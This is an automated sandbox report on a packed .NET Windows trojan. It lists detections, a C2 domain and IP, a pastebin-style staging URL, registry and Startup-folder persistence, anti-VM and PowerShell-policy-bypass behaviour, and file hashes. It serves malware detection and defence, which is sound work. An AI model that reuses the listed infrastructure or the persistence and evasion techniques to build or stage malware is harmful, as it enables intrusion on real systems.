              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536954 Sample: SecuriteInfo.com.Trojan.Pac... Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 40 rentry.co 2->40 42 xworm1337.ddnsgratis.com.br 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 56 13 other signatures 2->56 8 SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe 16 5 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 svchost.exe 2->17         started        signatures3 54 Connects to a pastebin service (likely for C&C) 40->54 process4 dnsIp5 44 xworm1337.ddnsgratis.com.br 194.5.152.215, 4443, 60591, 60604 DEDIPATH-LLCUS Germany 8->44 46 rentry.co 104.26.3.16, 443, 60605, 60606 CLOUDFLARENETUS United States 8->46 38 C:\Users\user\AppData\Local\svchost.exe, PE32 8->38 dropped 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->60 62 Protects its processes via BreakOnTermination flag 8->62 64 Bypasses PowerShell execution policy 8->64 72 2 other signatures 8->72 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        28 2 other processes 8->28 66 Antivirus detection for dropped file 13->66 68 Multi AV Scanner detection for dropped file 13->68 70 Machine Learning detection for dropped file 13->70 26 WerFault.exe 15->26         started        file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 19->58 30 conhost.exe 19->30         started        32 conhost.exe 22->32         started        34 conhost.exe 24->34         started        36 conhost.exe 28->36         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe50%ReversingLabsWin32.Trojan.Genie8DN
              SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe100%AviraTR/AD.Nekark.lxbih
              SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\svchost.exe100%AviraTR/AD.Nekark.lxbih
              C:\Users\user\AppData\Local\svchost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\svchost.exe50%ReversingLabsWin32.Trojan.Genie8DN

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              rentry.co
              		104.26.3.16
              		truetrue
                		unknown
                xworm1337.ddnsgratis.com.br
                		194.5.152.215
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://rentry.co/8wum7vax/rawfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2372879688.0000000005B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2416953557.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2463060306.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2366232332.0000000004C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004D37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.microsoftpowershell.exe, 00000002.00000002.2375364868.00000000075CA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://go.micropowershell.exe, 0000000B.00000002.2500442683.000000000591D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://rentry.co/static/icons/512.pngSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://upx.sf.netAmcache.hve.26.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.verisign.powershell.exe, 00000007.00000002.2468881268.00000000077C5000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://rentry.co/static/icons/270.pngSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2366232332.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://rentry.co/SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://rentry.co/8wum7vHvSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2366232332.0000000004C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004D37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2372879688.0000000005B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2416953557.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2463060306.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://rentry.coSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://rentry.codSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://rentry.co/8wum7vHSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://rentry.co/8wum7vax/rawTSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2366232332.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://rentry.coSecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://ion=v4.5xpowershell.exe, 00000002.00000002.2364873331.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://crl.microspowershell.exe, 0000000B.00000002.2529840862.00000000077BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.26.3.16
                                                		rentry.coUnited States
                                                		13335CLOUDFLARENETUStrue
                                                194.5.152.215
                                                		xworm1337.ddnsgratis.com.brGermany
                                                		35913DEDIPATH-LLCUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1536954
                                                Start date and time:2024-10-18 12:40:06 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 46s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:27
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Critical Process Termination
                                                Sample name:SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@20/27@5/2
                                                EGA Information:
                                                • Successful, ratio: 42.9%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 321
                                                • Number of non-executed functions: 6
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target powershell.exe, PID 3088 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 5536 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 7752 because it is empty
                                                • Execution Graph export aborted for target svchost.exe, PID 7816 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • VT rate limit hit for: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                06:41:18API Interceptor4831498x Sleep call for process: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe modified
                                                06:41:20API Interceptor47x Sleep call for process: powershell.exe modified
                                                06:41:49API Interceptor2x Sleep call for process: svchost.exe modified
                                                12:41:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
                                                12:41:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
                                                12:41:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                104.26.3.16nkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                  R6IuO0fzec.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                    FluxusV2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                      egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                        SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exeGet hashmaliciousUnknownBrowse
                                                          4wx72yFLka.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                                            quotation.jsGet hashmaliciousUnknownBrowse
                                                              Quote.jsGet hashmaliciousUnknownBrowse
                                                                SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                                                                    194.5.152.215R8zKsetGjK.exeGet hashmaliciousUnknownBrowse
                                                                      vmjewk4cBI.exeGet hashmaliciousUnknownBrowse
                                                                        n7c4wEaovN.exeGet hashmaliciousUnknownBrowse
                                                                          NszzrGz7Vp.exeGet hashmaliciousUnknownBrowse
                                                                            R8zKsetGjK.exeGet hashmaliciousUnknownBrowse
                                                                              n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                                                                n7c4wEaovN.exeGet hashmaliciousUnknownBrowse
                                                                                  JCQD6V2tgY.exeGet hashmaliciousUnknownBrowse
                                                                                    vmjewk4cBI.exeGet hashmaliciousUnknownBrowse
                                                                                      NszzrGz7Vp.exeGet hashmaliciousUnknownBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        rentry.conkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                                                        • 104.26.3.16
                                                                                        r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                                                        • 104.26.2.16
                                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.75.40
                                                                                        hzUKkzHBqd.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 104.26.2.16
                                                                                        MVgsmZoDvQ.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                        • 172.67.75.40
                                                                                        hQI2tssFc0.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.2.16
                                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.2.16
                                                                                        cs.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                        • 172.67.75.40
                                                                                        R6IuO0fzec.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                        • 104.26.3.16
                                                                                        FluxusV2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                        • 104.26.3.16

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        DEDIPATH-LLCUSR8zKsetGjK.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        vmjewk4cBI.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        n7c4wEaovN.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        NszzrGz7Vp.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        R8zKsetGjK.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                                                                        • 194.5.152.215
                                                                                        n7c4wEaovN.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        JCQD6V2tgY.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        vmjewk4cBI.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        NszzrGz7Vp.exeGet hashmaliciousUnknownBrowse
                                                                                        • 194.5.152.215
                                                                                        CLOUDFLARENETUShttps:/syfnna.click/isciii.es/index.htmGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.53.8
                                                                                        https://icomera-dot-officemaxnricron.wl.r.appspot.com/Get hashmaliciousUnknownBrowse
                                                                                        • 104.18.68.40
                                                                                        https://share.nuclino.com/p/Mlanie-BAUDRY-PARTAGER-UN-FICHIER-POUR-RVISION-4ogXl9spWg3RaCX5e3wD3bGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.48.111
                                                                                        NbJ53jOHvQ.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.206.204
                                                                                        https://bino8-7920.twil.io/index4.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.11.207
                                                                                        PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 188.114.97.3
                                                                                        https://u47461937.ct.sendgrid.net/ls/click?upn=u001.90WJ2x5yie-2F4sdO-2BZ5bb0nufavWldnzsl0KnsmK3hMo-2BHMnWSF3DsxzbvDCWDsdFnegn-2BfWobRZ1kbLGMXgyXcGtyLzQM-2FGP3QHbHRPWVr6D0fLK-2BSNRq-2FVCZMabreIai9D-2BxA6whvHN5s1OqTfwm-2FgZQjeYErjyMYjob5nOcXGpRAG25SYwaNre11j-2BHVoXasoyLNyJtD1tPPwnUAPCOFLp9PDvSbufCeZgma-2FIK98-3Dcm_y_Ukbh-2F8Y2Z4RsyLMh2XL7Wo3yUsBZ9SeqI2Qmy9Bgt19mw9e4WkHPMitoZcq809ebbnmk8C6IJ5c7t29jrnIindsFxuY2R9d234nclZXStC9HmqBttLLojHUGnXdAWF5QJUx33skMns1apjumw9Pw3UfSTdjnlg5PrNNACcyuKpBoq4ETSyFgl4lbha5Mxiy3uArHLEv6ML9dlCYMz2aiMvH1U2BEaexXFmP3HsruDeCB11cOufMst2ySj2lo1MOLQ6aZD-2BJx5wirMGc5AFzol7YsHD-2BfJQUWDmNRvkyRWdsBEj0IMNeL5wqNyxjJ5hFrqTXQmCwpYMQ2bnKr-2BkBvSNUHzpUEqp-2BnPgQfjdKbtF3Z3im1MIzPwzt8NSpo3Gg6TTmqFNZ2ScP-2B7-2FoMepCdwrUSGGaAVc4bnbc7YhyZk1NsGgzWXhuiw5qQURbTlrLrNfUfcY80DFOe7nGqmxieALgNl9N387kxhKpFX-2Fnaawfjy5aLaOcnI1bIrW45QsQlpLgwiJocPCDckAx-2FSSuaxIwXkaLYj-2FPzrmv96ov5y2izrBMhWyBmDCPvZ5WDVvkaVY5wttF199PKn9A3y6nDVW-2BcDvQHCHFjHnYq34GMvKniNSIx5hiSo-2BnAFE75yLesQfb-2FtMOsyAp0aASAHTKj4fiYZ1gy2gQ6aTtm45axQJBOPfoW1XG1ZFy5zgMRuRNvLru7MEMaKlOzOBvYn-2BIMfSSpi7rtbb5t8KWTZg-2Br-2FY0Ad2S34htMKob86jSLvk5Zj3Hait9j-2B0TErriVJ9hutTBGU0IAH7S4LkHhpEYm9x8mvC3Gf2BwyPLHtkXi3HaVRoBV6YloGkBzCRSLnpyl2LhtBuhCV3pZreRfYAQGhh7nnEOGs0Wuw1wnYjV9yfByZ0NgFI-2Bs3XMcHsUMwml5eg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.21.74.54
                                                                                        http://plankton-app-xfp49.ondigitalocean.appGet hashmaliciousTechSupportScamBrowse
                                                                                        • 104.17.25.14
                                                                                        SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cjar.14389.14563.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.61.3

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eSKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 104.26.3.16
                                                                                        Z2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.3.16
                                                                                        picturewithgirlsloveoneverydayhii.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                        • 104.26.3.16
                                                                                        VXCBND3435.exeGet hashmaliciousLokibotBrowse
                                                                                        • 104.26.3.16
                                                                                        v8AZ8ANS6a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.26.3.16
                                                                                        DHL AWB - COMMERCIAL INVOICE AND BL.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 104.26.3.16
                                                                                        Shipping Documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 104.26.3.16
                                                                                        PURCHASE SPCIFICIATIONS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 104.26.3.16
                                                                                        Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 104.26.3.16
                                                                                        RFQ-KTE-07102024.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.26.3.16

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_ecb7224a96aebb5f13ab4a339763f756c6efdfd_f341adf0_099d329f-1a3a-473a-b457-968e673c5fa9\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.4545167081064898
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:w4FJ/F7jM0BU/6aGASibtCJDozuiF7Z24IO8/43M:wSJ/JjHBU/6az5JCtozuiF7Y4IO8/IM
                                                                                        MD5:B1473E5BE457A65F8DB5682D54346B8C
                                                                                        SHA1:B2AB5D85C9A26B4910953D4C62E7BB2835B0EABE
                                                                                        SHA-256:44A7A8CF55C569B4A2E8E7F13000D13491537273E99F22BBC9D8133492EB74A1
                                                                                        SHA-512:6803FC6CBA04BE0258DFF8D2E65F39DFA6480F2613E4351073673108BD69E1270906FF20780053807CFC3939998A7D9E8075660D6F0933156954C30D3D98579A
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.7.2.1.8.7.3.6.8.7.0.4.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.9.d.3.2.9.f.-.1.a.3.a.-.4.7.3.a.-.b.4.5.7.-.9.6.8.e.6.7.3.c.5.f.a.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.d.c.5.8.d.8.-.7.1.4.2.-.4.3.e.c.-.8.b.7.8.-.7.1.3.c.a.c.8.e.0.4.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...P.a.c.k.e.d.N.E.T...2.9.1.5...5.8.1.3...2.8.0.0.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.c.-.0.0.0.1.-.0.0.1.5.-.4.6.4.e.-.0.9.4.3.4.a.2.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.8.7.7.7.f.1.a.b.0.0.5.3.d.2.8.3.a.f.1.5.e.2.d.e.8.c.6.f.f.7.f.0.0.0.0.0.9.0.4.!.0.0.0.0.9.c.4.0.b.8.b.8.3.0.8.e.7.a.8.7.f.7.8.1.f.0.2.f.6.b.1.a.d.d.7.c.6.4.6.3.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E43.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Fri Oct 18 10:44:34 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):460813
                                                                                        Entropy (8bit):3.8875625799198117
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:nDmnsxeGTxiWGBWhhL9DEO4uEqs4ylb3T+BslmLTglmI9HQCCT9fn5sJ/P:n54xWCkhp4O4b4ylmB0kTga9fs/
                                                                                        MD5:6AD21CF2C31CD6A18986E8127DBA9C1A
                                                                                        SHA1:BFFE26A705A45168750214A692D12F0345B532F8
                                                                                        SHA-256:7DC5565CACAF16F44FC485AF53EEC16C3E92898C1DF9B949652A119163C8241D
